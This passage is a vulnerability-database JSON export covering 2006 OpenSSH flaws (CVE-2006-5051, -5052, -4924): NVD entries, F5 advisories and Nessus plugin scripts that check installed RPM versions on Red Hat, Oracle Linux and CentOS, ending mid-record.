{"cve": [{"lastseen": "2019-05-29T18:08:34", "bulletinFamily": "NVD", "description": "Signal handler race condition in OpenSSH before 4.4 allows remote attackers to cause a denial of service (crash), and possibly execute arbitrary code if GSSAPI authentication is enabled, via unspecified vectors that lead to a double-free.\nSuccessful code execution exploitation requires that GSSAPI authentication is enabled.", "modified": "2017-10-11T01:31:00", "id": "CVE-2006-5051", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5051", "published": "2006-09-27T23:07:00", "title": "CVE-2006-5051", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:08:34", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in portable OpenSSH before 4.4, when running on some platforms, allows remote attackers to determine the validity of usernames via unknown vectors involving a GSSAPI \"authentication abort.\"", "modified": "2018-10-17T21:40:00", "id": "CVE-2006-5052", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5052", "published": "2006-09-27T23:07:00", "title": "CVE-2006-5052", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:08:34", "bulletinFamily": "NVD", "description": "sshd in OpenSSH before 4.4, when using the version 1 SSH protocol, allows remote attackers to cause a denial of service (CPU consumption) via an SSH packet that contains duplicate blocks, which is not properly handled by the CRC compensation attack detector.", "modified": "2018-10-17T21:40:00", "id": "CVE-2006-4924", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4924", "published": "2006-09-27T01:07:00", "title": "CVE-2006-4924", "type": "cve", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "f5": [{"lastseen": "2017-06-08T00:16:02", "bulletinFamily": "software", "description": "", "modified": "2016-01-09T02:26:00", "published": "2006-12-08T03:00:00", "id": "F5:K6876", "href": "https://support.f5.com/csp/article/K6876", "title": "OpenSSH vulnerabilities CVE-2006-5052", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-06-08T00:16:38", "bulletinFamily": "software", "description": "", "modified": "2016-01-09T02:27:00", "published": "2006-12-12T03:00:00", "id": "F5:K6881", "href": "https://support.f5.com/csp/article/K6881", "title": "SSHv1 vulnerabilities CVE-2006-4924", "type": "f5", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:06", "bulletinFamily": "software", "description": "This security advisory describes an OpenSSH version 1 vulnerability. When using version SSH version 1 protocol, remote attacks cause a denial of service attack when the **sshd** process is used in OpenSSH versions previous to version 4.4. This occurs when using an SSH packet that contains duplicate blocks. The SSH packets that contain duplicate blocks are not handled correctly by the CRC compensation attack detector, which results in high CPU consumption.\n\nInformation about this advisory is available at the following location:\n\n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4924>\n", "modified": "2013-03-19T00:00:00", "published": "2006-12-11T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/6000/800/sol6881.html", "id": "SOL6881", "title": "SOL6881 - SSHv1 vulnerabilities CVE-2006-4924", "type": "f5", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:07", "bulletinFamily": "software", "description": "This security advisory describes an OpenSSH vulnerability. OpenSSH versions previous to version 4.4, on platforms with GSSAPI enabled, allow remote attackers to determine the validity of usernames through a Generic Security Services Application Program Interface (GSSAPI) **authentication abort** response.\n\n**Important**: F5 disables GSSAPI by default, although some third-party platforms have GSSAPI enabled.\n\nThe **authentication abort** response is issued when GSSAPI is enabled and a user attempts to log in a certain number of times using an incorrect password. Remote attackers can use this **authentication abort** response to validate whether the username exists on the system.\n\nInformation about this advisory is available at the following location:\n\n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5052>\n\n**Note**: This link takes you to a resource outside of AskF5, and it is possible that the information may be removed without our knowledge.\n", "modified": "2013-03-26T00:00:00", "published": "2006-12-07T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/6000/800/sol6876.html", "id": "SOL6876", "title": "SOL6876 - OpenSSH vulnerabilities CVE-2006-5052", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-06-08T00:16:22", "bulletinFamily": "software", "description": "", "modified": "2016-01-09T02:25:00", "published": "2006-10-11T04:00:00", "href": "https://support.f5.com/csp/article/K6736", "id": "F5:K6736", "title": "OpenSSH vulnerabilities CAN-2006-5051, CAN-2006-4924", "type": "f5", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:16", "bulletinFamily": "software", "description": "This security advisory describes an OpenSSH Signal Handling vulnerability (CVE-2006-5051). A remote attacker could possibly leverage this flaw to cause a denial of service.\n\nThis security advisory also describes a denial of service bug (CVE-2006-4924) in the OpenSSH **sshd** server. A remote attacker can send a specially crafted SSH-1 request to the server causing the SSH daemon, **sshd**, to consume a large quantity of CPU resources.\n\nInformation about this advisory is available at the following locations:\n\n**Note**: These links take you to a resource outside of AskF5, and it is possible that the documents may be removed without our knowledge.\n\n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5051>\n\n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4924>\n\n**Note**: The vulnerable F5 products listed use the SSH versions determined to be vulnerable to advisory CVE-2006-5051. However, the GSSAPI authentication features required to exploit the vulnerability are not enabled.\n\nF5 Product Development tracked this issue as CR70329, CR70330, and CR70313 for BIG-IP LTM, BIG-IP GTM and BIG-IP ASM, and it was fixed in version 9.4.2. For information about upgrading, refer to the BIG-IP LTM, GTM, ASM release notes.\n\nF5 Product Development tracked this issue as CR70315 for Enterprise Manager, and it was fixed in version 1.4.1. For information about upgrading, refer to the Enterprise Manager release notes.\n", "modified": "2013-03-26T00:00:00", "published": "2006-10-10T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/6000/700/sol6736.html", "id": "SOL6736", "title": "SOL6736 - OpenSSH vulnerabilities CAN-2006-5051, CAN-2006-4924", "type": "f5", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:09:41", "bulletinFamily": "software", "description": "Recommended action\n\nNone \n\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "modified": "2014-07-30T00:00:00", "published": "2013-10-10T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/14000/700/sol14742.html", "id": "SOL14742", "title": "SOL14742 - OpenSSH vulnerability CVE-2008-4109", "type": "f5", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-02-21T01:09:25", "bulletinFamily": "scanner", "description": "Updated openssh packages that fix two security flaws are now available for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nOpenSSH is OpenBSD's SSH (Secure SHell) protocol implementation. This package includes the core files necessary for both the OpenSSH client and server.\n\nMark Dowd discovered a signal handler race condition in the OpenSSH sshd server. A remote attacker could possibly leverage this flaw to cause a denial of service (crash). (CVE-2006-5051) The OpenSSH project believes the likelihood of successful exploitation leading to arbitrary code execution appears remote. However, the Red Hat Security Response Team have not yet been able to verify this claim due to lack of upstream vulnerability information. We are therefore including a fix for this flaw and have rated it important security severity in the event our continued investigation finds this issue to be exploitable.\n\nTavis Ormandy of the Google Security Team discovered a denial of service bug in the OpenSSH sshd server. A remote attacker can send a specially crafted SSH-1 request to the server causing sshd to consume a large quantity of CPU resources. (CVE-2006-4924)\n\nAll users of openssh should upgrade to these updated packages, which contain backported patches that resolves these issues.", "modified": "2018-11-16T00:00:00", "id": "REDHAT-RHSA-2006-0697.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22473", "published": "2006-09-29T00:00:00", "title": "RHEL 3 / 4 : openssh (RHSA-2006:0697)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2006:0697. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22473);\n script_version (\"1.23\");\n script_cvs_date(\"Date: 2018/11/16 15:19:25\");\n\n script_cve_id(\"CVE-2006-4924\", \"CVE-2006-5051\", \"CVE-2006-5052\");\n script_bugtraq_id(20216, 20241);\n script_xref(name:\"RHSA\", value:\"2006:0697\");\n\n script_name(english:\"RHEL 3 / 4 : openssh (RHSA-2006:0697)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated openssh packages that fix two security flaws are now available\nfor Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nOpenSSH is OpenBSD's SSH (Secure SHell) protocol implementation. This\npackage includes the core files necessary for both the OpenSSH client\nand server.\n\nMark Dowd discovered a signal handler race condition in the OpenSSH\nsshd server. A remote attacker could possibly leverage this flaw to\ncause a denial of service (crash). (CVE-2006-5051) The OpenSSH project\nbelieves the likelihood of successful exploitation leading to\narbitrary code execution appears remote. However, the Red Hat Security\nResponse Team have not yet been able to verify this claim due to lack\nof upstream vulnerability information. We are therefore including a\nfix for this flaw and have rated it important security severity in the\nevent our continued investigation finds this issue to be exploitable.\n\nTavis Ormandy of the Google Security Team discovered a denial of\nservice bug in the OpenSSH sshd server. A remote attacker can send a\nspecially crafted SSH-1 request to the server causing sshd to consume\na large quantity of CPU resources. (CVE-2006-4924)\n\nAll users of openssh should upgrade to these updated packages, which\ncontain backported patches that resolves these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-4924\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-5051\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2006:0697\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(362, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh-askpass\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/09/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x / 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2006:0697\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"openssh-3.6.1p2-33.30.12\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"openssh-askpass-3.6.1p2-33.30.12\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"openssh-askpass-gnome-3.6.1p2-33.30.12\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"openssh-clients-3.6.1p2-33.30.12\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"openssh-server-3.6.1p2-33.30.12\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"openssh-3.9p1-8.RHEL4.17\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"openssh-askpass-3.9p1-8.RHEL4.17\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"openssh-askpass-gnome-3.9p1-8.RHEL4.17\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"openssh-clients-3.9p1-8.RHEL4.17\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"openssh-server-3.9p1-8.RHEL4.17\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh / openssh-askpass / openssh-askpass-gnome / openssh-clients / etc\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:19:11", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2006:0697 :\n\nUpdated openssh packages that fix two security flaws are now available for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nOpenSSH is OpenBSD's SSH (Secure SHell) protocol implementation. This package includes the core files necessary for both the OpenSSH client and server.\n\nMark Dowd discovered a signal handler race condition in the OpenSSH sshd server. A remote attacker could possibly leverage this flaw to cause a denial of service (crash). (CVE-2006-5051) The OpenSSH project believes the likelihood of successful exploitation leading to arbitrary code execution appears remote. However, the Red Hat Security Response Team have not yet been able to verify this claim due to lack of upstream vulnerability information. We are therefore including a fix for this flaw and have rated it important security severity in the event our continued investigation finds this issue to be exploitable.\n\nTavis Ormandy of the Google Security Team discovered a denial of service bug in the OpenSSH sshd server. A remote attacker can send a specially crafted SSH-1 request to the server causing sshd to consume a large quantity of CPU resources. (CVE-2006-4924)\n\nAll users of openssh should upgrade to these updated packages, which contain backported patches that resolves these issues.", "modified": "2018-07-18T00:00:00", "id": "ORACLELINUX_ELSA-2006-0697.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=67412", "published": "2013-07-12T00:00:00", "title": "Oracle Linux 4 : openssh (ELSA-2006-0697)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2006:0697 and \n# Oracle Linux Security Advisory ELSA-2006-0697 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67412);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/07/18 17:43:55\");\n\n script_cve_id(\"CVE-2006-4924\", \"CVE-2006-5051\", \"CVE-2006-5052\");\n script_bugtraq_id(20216, 20241);\n script_xref(name:\"RHSA\", value:\"2006:0697\");\n\n script_name(english:\"Oracle Linux 4 : openssh (ELSA-2006-0697)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2006:0697 :\n\nUpdated openssh packages that fix two security flaws are now available\nfor Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nOpenSSH is OpenBSD's SSH (Secure SHell) protocol implementation. This\npackage includes the core files necessary for both the OpenSSH client\nand server.\n\nMark Dowd discovered a signal handler race condition in the OpenSSH\nsshd server. A remote attacker could possibly leverage this flaw to\ncause a denial of service (crash). (CVE-2006-5051) The OpenSSH project\nbelieves the likelihood of successful exploitation leading to\narbitrary code execution appears remote. However, the Red Hat Security\nResponse Team have not yet been able to verify this claim due to lack\nof upstream vulnerability information. We are therefore including a\nfix for this flaw and have rated it important security severity in the\nevent our continued investigation finds this issue to be exploitable.\n\nTavis Ormandy of the Google Security Team discovered a denial of\nservice bug in the OpenSSH sshd server. A remote attacker can send a\nspecially crafted SSH-1 request to the server causing sshd to consume\na large quantity of CPU resources. (CVE-2006-4924)\n\nAll users of openssh should upgrade to these updated packages, which\ncontain backported patches that resolves these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2006-November/000010.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssh packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(362, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssh-askpass\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssh-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"openssh-3.9p1-8.RHEL4.17\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"openssh-3.9p1-8.RHEL4.17\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"openssh-askpass-3.9p1-8.RHEL4.17\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"openssh-askpass-3.9p1-8.RHEL4.17\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"openssh-askpass-gnome-3.9p1-8.RHEL4.17\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"openssh-askpass-gnome-3.9p1-8.RHEL4.17\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"openssh-clients-3.9p1-8.RHEL4.17\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"openssh-clients-3.9p1-8.RHEL4.17\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"openssh-server-3.9p1-8.RHEL4.17\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"openssh-server-3.9p1-8.RHEL4.17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh / openssh-askpass / openssh-askpass-gnome / openssh-clients / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:09:25", "bulletinFamily": "scanner", "description": "Updated openssh packages that fix two security flaws are now available for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nOpenSSH is OpenBSD's SSH (Secure SHell) protocol implementation. This package includes the core files necessary for both the OpenSSH client and server.\n\nMark Dowd discovered a signal handler race condition in the OpenSSH sshd server. A remote attacker could possibly leverage this flaw to cause a denial of service (crash). (CVE-2006-5051) The OpenSSH project believes the likelihood of successful exploitation leading to arbitrary code execution appears remote. However, the Red Hat Security Response Team have not yet been able to verify this claim due to lack of upstream vulnerability information. We are therefore including a fix for this flaw and have rated it important security severity in the event our continued investigation finds this issue to be exploitable.\n\nTavis Ormandy of the Google Security Team discovered a denial of service bug in the OpenSSH sshd server. A remote attacker can send a specially crafted SSH-1 request to the server causing sshd to consume a large quantity of CPU resources. (CVE-2006-4924)\n\nAll users of openssh should upgrade to these updated packages, which contain backported patches that resolves these issues.", "modified": "2018-11-10T00:00:00", "id": "CENTOS_RHSA-2006-0697.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22485", "published": "2006-10-02T00:00:00", "title": "CentOS 3 / 4 : openssh / openssl (CESA-2006:0697)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2006:0697 and \n# CentOS Errata and Security Advisory 2006:0697 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22485);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/11/10 11:49:27\");\n\n script_cve_id(\"CVE-2006-4924\", \"CVE-2006-5051\", \"CVE-2006-5052\");\n script_bugtraq_id(20216, 20241);\n script_xref(name:\"RHSA\", value:\"2006:0697\");\n\n script_name(english:\"CentOS 3 / 4 : openssh / openssl (CESA-2006:0697)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated openssh packages that fix two security flaws are now available\nfor Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nOpenSSH is OpenBSD's SSH (Secure SHell) protocol implementation. This\npackage includes the core files necessary for both the OpenSSH client\nand server.\n\nMark Dowd discovered a signal handler race condition in the OpenSSH\nsshd server. A remote attacker could possibly leverage this flaw to\ncause a denial of service (crash). (CVE-2006-5051) The OpenSSH project\nbelieves the likelihood of successful exploitation leading to\narbitrary code execution appears remote. However, the Red Hat Security\nResponse Team have not yet been able to verify this claim due to lack\nof upstream vulnerability information. We are therefore including a\nfix for this flaw and have rated it important security severity in the\nevent our continued investigation finds this issue to be exploitable.\n\nTavis Ormandy of the Google Security Team discovered a denial of\nservice bug in the OpenSSH sshd server. A remote attacker can send a\nspecially crafted SSH-1 request to the server causing sshd to consume\na large quantity of CPU resources. (CVE-2006-4924)\n\nAll users of openssh should upgrade to these updated packages, which\ncontain backported patches that resolves these issues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-September/013294.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?42ac1cd5\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-September/013295.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8500f549\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-September/013296.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4eca25d6\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-September/013300.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?da00f6c1\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-September/013301.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b734a975\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-September/013304.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e63f62ee\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-September/013305.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?59033243\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssh and / or openssl packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(362, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssh-askpass\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", 